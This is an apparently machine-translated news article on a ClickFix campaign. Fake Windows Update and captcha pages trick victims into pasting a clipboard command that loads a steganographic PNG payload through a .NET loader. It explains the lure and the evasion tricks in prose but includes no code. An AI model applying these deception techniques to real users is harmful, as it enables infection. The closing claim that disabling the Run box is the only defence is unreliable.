Summary
-
The full-screen fake Windows Update or verification code tricks users into inserting and executing the attacker's commands.
-
The malware is stored steganographically in PNG pixels; The .NET Stego loader extracts, decrypts, and runs it in memory.
-
The clipboard trick forces victims to paste commands; The loader loads the image and runs 10,000 empty functions to avoid parsing.
Social engineering attacks are probably still one of the most commonly used ways to infect a computer or steal someone's data. A well-executed social engineering attack can have some pretty nasty consequences. It even uses a fake Windows Update screen to wrap things up.
Cybersecurity researchers have discovered a complex evolution of “ClickFix” social engineering attacks, with attackers now combining realistic fake Windows Update animations with advanced social engineering techniques to compromise systems. If you don't know what a ClickFix attack is, its purpose is to force a user to perform an action that security software would normally block from being performed automatically.
In these new variants, victims are faced with full-screen browser pages simulating a critical Windows security update or a “human verification” captcha. The page prompts the user to press a specific key sequence to resolve an error or confirm their identity. Unbeknownst to the user, the JavaScript running on the malicious site has already copied the malicious command to the clipboard. When a user follows keystroke instructions (often including pasting into the Windows Run window or Command Prompt), they inadvertently execute attacker code.
It's actually quite clever, and that's what makes it scary. What makes this particular campaign different is the use of steganography to hide the malware payload. Instead of downloading a recognizable malicious file, attackers hide code inside the pixel data of PNG images. Huntress researchers explained that the malicious code is encoded directly into certain color channels of the image. To the casual observer or a routine security scan, the file appears to be an innocuous image. However, the attack chain involves a .NET assembly known as “Stego Loader”. This downloader is responsible for analyzing the image, extracting the encrypted payload from the pixels and decrypting it in memory.
It works like this: You visit a website that displays a false full-screen error, such as Windows Update freezing or the “verify you are human” check. Background scripts on the site secretly copy malicious code to your computer's clipboard. The screen will prompt you to open the Windows Run prompt and paste text to “fix” the problem, and once you press Enter, the command will download a seemingly harmless image file that actually contains malware, which is then decrypted using Stego Loader. The entry point function initiates calls to 10,000 empty functions to exhaust or confuse the analysis tools before executing the actual payload.
You or I probably wouldn't fall victim to this. But think about the elderly person who might be fooled by this, for example by clicking on the wrong link on the Internet. A disaster waiting to happen. To prevent this, you can disable the Run box on your grandfather's computer, but there's nothing else you can do.
Source: Computer beeping
